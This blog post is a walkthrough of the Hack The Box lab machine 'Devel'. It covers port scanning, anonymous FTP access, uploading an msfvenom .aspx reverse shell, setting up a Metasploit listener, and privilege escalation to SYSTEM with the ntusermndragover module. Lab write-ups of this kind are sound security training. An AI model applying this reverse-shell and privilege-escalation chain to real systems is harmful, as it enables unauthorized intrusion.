Post

Hackthebox Devel Walkthrough

Hackthebox Devel Walkthrough

Posted Updated
Preview Image
By Hitesh Sharma
3 min read
Hackthebox Devel Walkthrough

Devel, while relatively simple, demonstrates the security risks associated with some default program configurations. It is a beginner-level machine which can be completed using publicly available exploits.

Image1

  • Let’s Spawn the machine

Image2

# Enumeration

  • Let’s Start with the Nmap scan
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23

┌──(kali㉿kali)-[~/Desktop/HTB]
└─$ nmap -sC -sV -p- 10.10.10.5 --min-rate=1500      
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-08 06:30 EDT
Nmap scan report for 10.10.10.5
Host is up (0.24s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
|_03-17-17  05:37PM               184946 welcome.png
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-title: IIS7
|_http-server-header: Microsoft-IIS/7.5
| http-methods: 
|_  Potentially risky methods: TRACE
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.28 seconds
  • there nothign much to explore its very straight forward machine …

Port 21 : Ftp Service
Port 80 : Microsoft_IIS server

  • we are able to connect to the ftp server using the anonymous login anonymous:anonymous

Image3

  • listing file the files revels that this is the directory for the IIS webserver , means the file we upload through the ftp server can be accessed through IIS server directory through root directory .

  • let’s generate .aspx reverse shell file using msfvenom

Image4

  • we can upload this using put command through ftp server .

Image5

# Exploitation

  • we can set the listner on the metasploit if we want using
1
2
3
4
5

use /multi/handler
set payload <payload>
set lost <attacker-IP>
set lport <listner port>
run
  • and we can access our file , which we have upload on the server …

Image6

  • as soon as we visit that file reverse shell will be triggered on our metasploit listner , and we got shell as IIS APPPOOL\Web similar to www-data on linux…

Image7

  • now we can background the process ( CTRL+Z ) and use the metasploit’s /multi/recon/local_exploit_suggestor module by setting the session id where we have the meterpreter connection.

Image8

  • as we run this module we will get the probable way to escaalte the privileges ..

Image9

  • here we will use the exploit/windows/local/ntusermndragover module for privilege escalation by setting the session id and run it … after a little while , we will get the shell as NT AUTHORITY\SYSTEM

Image10

  • now we can grab the user.txt file

Image11

  • similarly we can get the root hash
1
2
3
4
5
6
7
8
9

 Directory of C:\Users\Administrator\Desktop

14/01/2021  12:42 ��    <DIR>          .
14/01/2021  12:42 ��    <DIR>          ..
08/06/2025  01:28 ��                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5.027.282.944 bytes free

C:\Users\Administrator\Desktop>type root.txt

we can also go the manual way if we want …


# Final Thoughts

I hope this blog continues to be helpful in your learning journey!. If you find this blog helpful, I’d love to hear your thoughts — my inbox is always open for feedback. Please excuse any typos, and feel free to point them out so I can correct them. Thanks for understanding and happy learning!. You can contact me on Linkedin and Twitter
linkdin
Twitter

Walkthrough
hackthebox Devel Walkthrough windows
This post is licensed under CC BY 4.0 by the author.